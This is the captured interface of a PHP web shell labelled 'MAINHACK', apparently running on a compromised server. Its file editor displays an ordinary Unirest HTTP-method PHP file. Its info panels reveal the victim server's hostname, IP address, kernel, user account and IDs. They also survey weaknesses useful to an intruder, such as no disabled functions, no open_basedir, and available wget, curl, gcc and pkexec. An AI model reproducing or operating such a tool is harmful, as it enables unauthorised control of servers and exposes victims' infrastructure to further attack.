[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: Method.php
<?php /** * Hypertext Transfer Protocol (HTTP) Method Registry * * http://www.iana.org/assignments/http-methods/http-methods.xhtml */ namespace Unirest; interface Method { // RFC7231 const GET = 'GET'; const HEAD = 'HEAD'; const POST = 'POST'; const PUT = 'PUT'; const DELETE = 'DELETE'; const CONNECT = 'CONNECT'; const OPTIONS = 'OPTIONS'; const TRACE = 'TRACE'; // RFC3253 const BASELINE = 'BASELINE'; // RFC2068 const LINK = 'LINK'; const UNLINK = 'UNLINK'; // RFC3253 const MERGE = 'MERGE'; const BASELINECONTROL = 'BASELINE-CONTROL'; const MKACTIVITY = 'MKACTIVITY'; const VERSIONCONTROL = 'VERSION-CONTROL'; const REPORT = 'REPORT'; const CHECKOUT = 'CHECKOUT'; const CHECKIN = 'CHECKIN'; const UNCHECKOUT = 'UNCHECKOUT'; const MKWORKSPACE = 'MKWORKSPACE'; const UPDATE = 'UPDATE'; const LABEL = 'LABEL'; // RFC3648 const ORDERPATCH = 'ORDERPATCH'; // RFC3744 const ACL = 'ACL'; // RFC4437 const MKREDIRECTREF = 'MKREDIRECTREF'; const UPDATEREDIRECTREF = 'UPDATEREDIRECTREF'; // RFC4791 const MKCALENDAR = 'MKCALENDAR'; // RFC4918 const PROPFIND = 'PROPFIND'; const LOCK = 'LOCK'; const UNLOCK = 'UNLOCK'; const PROPPATCH = 'PROPPATCH'; const MKCOL = 'MKCOL'; const COPY = 'COPY'; const MOVE = 'MOVE'; // RFC5323 const SEARCH = 'SEARCH'; // RFC5789 const PATCH = 'PATCH'; // RFC5842 const BIND = 'BIND'; const UNBIND = 'UNBIND'; const REBIND = 'REBIND'; }
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server1.winmanyltd.com
Server IP: 203.161.60.52
PHP Version: 8.3.27
Server Software: Apache
System: Linux server1.winmanyltd.com 4.18.0-553.22.1.el8_10.x86_64 #1 SMP Tue Sep 24 05:16:59 EDT 2024 x86_64
HDD Total: 117.98 GB
HDD Free: 59.65 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
Yes
git:
Yes
User Info
Username: eliosofonline
User ID (UID): 1002
Group ID (GID): 1003
Script Owner UID: 1002
Current Dir Owner: 1002